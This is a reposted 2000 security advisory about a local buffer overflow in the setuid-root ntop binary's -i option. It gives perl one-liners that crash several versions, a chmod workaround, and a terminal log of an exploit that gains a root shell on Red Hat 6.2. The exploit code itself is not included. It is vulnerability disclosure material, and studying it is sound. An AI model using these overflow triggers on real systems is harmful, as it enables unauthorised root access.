[ advisories | exploits | discussions | news | conventions | security tools | texts & papers ]
 main menu
- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news
- read forum
- new topic
- search

- meetings list
- recent additions
- add your info
 top 100 sites
- visit top sites
- sign up now
- members

- add your url
- add domain
- search box
- link to us

- our projects
- free email
 m4d network
- security software
- secureroot
- m4d.com
Home : Advisories : ntop local buffer overflow vulnerability

Title: ntop local buffer overflow vulnerability
Released by: Christophe Bailleux
Date: 24th October 2000
Printable version: Click here
Subject : ntop local buffer overflow vulnerability

Author  : Christophe BAILLEUX (cb@grolier.fr)

Plateforms : *nix

Test version : ntop 1.1, ntop 1.2.a7, ntop 1.3.1, ntop 1.3.2

I.      Problem

All ntop versions are vulnerabled to local buffer overflow attack in there

-i options.

Ntop must be owned by root with a setuid bit for the attacker to gain

root privileges.

II.     Demo

a) ntop 1.1

tshaw:/home/cb/ntop-1.1/$ ./ntop -i `perl -e 'print "A"x208'`

ntop v.1.1 MT [i686-pc-linux-gnu] listening on


Host      Act   -Rcvd-      Sent       TCP     UDP  ICMP

Segmentation fault


b) ntop 1.2a7

tshaw:/home/cb/ntop-1.2a7$ ./ntop -i `perl -e 'print "A"x109'`

Segmentation fault


c) ntop 1.3.1

tshaw:/home/cb/ntop-1.3.1$ ./ntop -i `perl -e 'print "A"x271'`

Segmentation fault


d) ntop 1.3.2

tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`

24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00

07:04:32 PM build)

24/Oct/2000:12:32:16 Listening on


24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri 

24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/

24/Oct/2000:12:32:16 Initialising...

Segmentation fault


III.    Workaround

chmod ug-s path/to/ntop

ntop team has been informed (http://www.ntop.org).

IV.     Exploit (See Attachment)

Tested on redhat 6.2 (Zoot) where ntop is installed by default with the

bit setuid root

[cb@nux cb]$ cat /etc/redhat-release

Red Hat Linux release 6.2 (Zoot)

[cb@nux cb]$ rpm -qf /sbin/ntop


[cb@nux cb]$ id

uid=535(cb) gid=535(cb) groups=535(cb)

[cb@nux cb]$ ./expl

ntop v.1.1 MT [i586-pc-linux-gnu] listening on


Host        Act   -Rcvd-      Sent    TCP   UDP ICMP


bash# id

uid=0(root) gid=535(cb) egid=3(sys) groups=535(cb)

bash# exit

[cb@nux cb]$

Greetings to kalou, Bdev, cleb, dv, PullthePlug Community and all i


Thanks Teuk for leating me use his server, for do and test ntop redhat

6.2 exploit :)



BAILLEUX Christophe - Network & System Security Engineer

Grolier Interactive Europe-OG/CS

Voice:+33-(0)1-5545-4789 - mailto:cb@grolier.fr

(C) 1999-2000 All rights reserved.